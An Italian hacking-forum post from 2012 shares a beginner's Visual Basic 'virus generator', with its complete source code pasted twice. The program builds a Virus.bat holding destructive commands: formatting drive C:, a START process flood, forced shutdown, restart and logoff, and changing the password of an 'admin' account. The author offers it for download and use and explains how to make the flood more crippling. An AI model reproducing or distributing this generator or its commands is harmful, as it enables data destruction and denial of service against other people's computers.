- 9 Aprile 2012
- 553
- 0
- Miglior risposta
- 0
Salve sciaxini, ieri mi sono messo in testa di fare un generatore di codici batch.
Questo è il mio primo programma in Visual basic 2010.
Commenti:
Il programma per alcuni è inutile.
Grafica è stata fatta abbastanza bene, si poteva far di meglio.
Ripeto è il mio primo programma quindi anche se per molti di voi è facile farlo per me non lo è stato da ieri sera che ci lavoro.
Accetto qualsisasi tipo di commento apparte insulti inutili, SOLO critiche costruttive.
Screen:
Scansione:
Vengono rilevati 5/42 virus, credo che il motivo sia che il generator produce file maligni, ma premetto che non è un trojan, rat, o roba simile.
Download:
Sotto richiesta ecco la Source:
CREATO DA : ME
Fatemi sapere cosa ne pensate !
Scusate per il per il periodo di tempo con link non funzionante, ora potete scaricare il generatore e usarlo (tutti i comandi fungono adesso, anche la source è funzionante PS: Lo screen non è aggiornato ho aggiunto un nuovo comando.Scusate per la presunzione (per alcuni autori dei commenti)nell'impalla pc dopo che lo generate cliccate tasto destro su di esso>Modifica e aggiungete più "START" a capo ancora "START" più volte scriverete "START" ecc... Più il computer si impallerà, l'ho provato sul mio pc chiudendo tutto e aprendo solo questo file mi si sono aperti 2000 processi. P.S.S : Se non riuscite a più a chiudere i CMD che si apriranno disconnettete utente).
Questo è il mio primo programma in Visual basic 2010.
Commenti:
Il programma per alcuni è inutile.
Grafica è stata fatta abbastanza bene, si poteva far di meglio.
Ripeto è il mio primo programma quindi anche se per molti di voi è facile farlo per me non lo è stato da ieri sera che ci lavoro.
Accetto qualsisasi tipo di commento apparte insulti inutili, SOLO critiche costruttive.
Screen:
Scansione:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Vengono rilevati 5/42 virus, credo che il motivo sia che il generator produce file maligni, ma premetto che non è un trojan, rat, o roba simile.
Download:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Sotto richiesta ecco la Source:
Imports System.IO.File
Public Class Form2
Dim scrivi As System.IO.StreamWriter
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If CheckBox1.Checked = True Then
TextBox1.Text = TextBox1.Text + "format C: /autotest /q /u" + vbCrLf
MsgBox("Hai selezionato formatta PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox2.Checked = True Then
TextBox1.Text = TextBox1.Text + "START" + vbCrLf + "START" + vbCrLf + "START" + vbCrLf + "START"
MsgBox("Hai selezionato impalla PC [Clicca tasto destro sul Virus->Modifica->Aggiungi altri Start per renderlo più potente!", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox3.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -s -f" + vbCrLf
MsgBox("Hai selezionato spegni PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox4.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -r -f" + vbCrLf
MsgBox("Hai selezionato Riavvia PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox5.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -l -f" + vbCrLf
MsgBox("Hai selezionato disconnetti utente PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox6.Checked = True Then
TextBox1.Text = TextBox1.Text + "DISATTIVA FIREWALL" + vbCrLf
MsgBox("Hai selezionato DISATTIVA FIREWALL", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox7.Checked = True Then
TextBox1.Text = TextBox1.Text + "@net user admin 123123" + vbCrLf
MsgBox("Hai selezionato cambia password Utente PC in : 123123", MsgBoxStyle.Information, "Virus generator")
End If
If MsgBox("Il Virus è stato generato con successo! Controlla nel tuo DeskTop!", MsgBoxStyle.Information, "Virus generator") Then
End If
scrivi = System.IO.File.AppendText(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) & "\Virus.bat")
scrivi.WriteLine(TextBox1.Text)
scrivi.Close()
TextBox1.Text = ""
TextBox1.Text = ""
End Sub
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
MsgBox("Hai appena aperto il Virus generator, ricorda di non usare più effetti o il virus non funzionerà! PS : NON mi assumo nessuna responsabilità dell'uso che ne farai, se accetti queste condizioni clicca si.", MsgBoxStyle.YesNo, "Virus generator")
End Sub
Private Sub CheckBox7_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs)
End Sub
End Class
Public Class Form2
Dim scrivi As System.IO.StreamWriter
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If CheckBox1.Checked = True Then
TextBox1.Text = TextBox1.Text + "format C: /autotest /q /u" + vbCrLf
MsgBox("Hai selezionato formatta PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox2.Checked = True Then
TextBox1.Text = TextBox1.Text + "START" + vbCrLf + "START" + vbCrLf + "START" + vbCrLf + "START"
MsgBox("Hai selezionato impalla PC [Clicca tasto destro sul Virus->Modifica->Aggiungi altri Start per renderlo più potente!", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox3.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -s -f" + vbCrLf
MsgBox("Hai selezionato spegni PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox4.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -r -f" + vbCrLf
MsgBox("Hai selezionato Riavvia PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox5.Checked = True Then
TextBox1.Text = TextBox1.Text + "shutdown -l -f" + vbCrLf
MsgBox("Hai selezionato disconnetti utente PC", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox6.Checked = True Then
TextBox1.Text = TextBox1.Text + "DISATTIVA FIREWALL" + vbCrLf
MsgBox("Hai selezionato DISATTIVA FIREWALL", MsgBoxStyle.Information, "Virus generator")
End If
If CheckBox7.Checked = True Then
TextBox1.Text = TextBox1.Text + "@net user admin 123123" + vbCrLf
MsgBox("Hai selezionato cambia password Utente PC in : 123123", MsgBoxStyle.Information, "Virus generator")
End If
If MsgBox("Il Virus è stato generato con successo! Controlla nel tuo DeskTop!", MsgBoxStyle.Information, "Virus generator") Then
End If
scrivi = System.IO.File.AppendText(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) & "\Virus.bat")
scrivi.WriteLine(TextBox1.Text)
scrivi.Close()
TextBox1.Text = ""
TextBox1.Text = ""
End Sub
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
MsgBox("Hai appena aperto il Virus generator, ricorda di non usare più effetti o il virus non funzionerà! PS : NON mi assumo nessuna responsabilità dell'uso che ne farai, se accetti queste condizioni clicca si.", MsgBoxStyle.YesNo, "Virus generator")
End Sub
Private Sub CheckBox7_CheckedChanged(ByVal sender As System.Object, ByVal e As System.EventArgs)
End Sub
End Class
CREATO DA : ME
Fatemi sapere cosa ne pensate !
Scusate per il per il periodo di tempo con link non funzionante, ora potete scaricare il generatore e usarlo (tutti i comandi fungono adesso, anche la source è funzionante PS: Lo screen non è aggiornato ho aggiunto un nuovo comando.Scusate per la presunzione (per alcuni autori dei commenti)nell'impalla pc dopo che lo generate cliccate tasto destro su di esso>Modifica e aggiungete più "START" a capo ancora "START" più volte scriverete "START" ecc... Più il computer si impallerà, l'ho provato sul mio pc chiudendo tutto e aprendo solo questo file mi si sono aperti 2000 processi. P.S.S : Se non riuscite a più a chiudere i CMD che si apriranno disconnettete utente).
Ultima modifica: